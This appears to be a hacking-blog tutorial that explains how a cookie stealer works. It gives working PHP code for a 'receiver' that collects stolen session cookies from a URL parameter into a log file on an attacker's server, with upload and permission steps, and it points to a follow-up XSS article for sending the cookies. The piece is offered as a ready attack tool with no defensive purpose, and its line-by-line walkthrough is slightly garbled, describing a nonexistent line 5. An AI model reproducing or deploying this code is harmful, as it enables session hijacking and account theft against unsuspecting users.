Hi friends, Lets know that exactly how does a cookie stealer work. There are two components in a cookie stealer: the sender and the receiver.
The sender can take many forms. In essense, it's just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.
The receiver, as the name suggests, is a device which receives the cookie from the sender. It can also take several forms, but the most common is that of a PHP document, most commonly found residing on some obscure webserver.
Php Coding a receiver is the part. Only two things are needed to make a receiver : a webhost/ftp which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).
As I said, the receiver's job is to receive the cookie from the sender. Once the receiver has the cookie, it needs a way to get that cookie to you.
<?php // line 1 $cookie = $HTTP_GET_VARS["cookie"]; // line 2 $file = fopen('cookielog.txt', 'a'); // line 3 fwrite($file, $cookie . "\n\n"); // line 4 ?>
Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("stealer.php?cookie=x") and stores it in the variable $cookie.
Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.
Line 5 is the same as before.
Done ! Just upload the files on ftp server and make permission of text file "cookielog.txt" to 777. How to grab cookies is explained in next articles "Complete tutorial on Cross Site Scripting / XSS Hacking !"
Thank you for reading this articles.
Post a Comment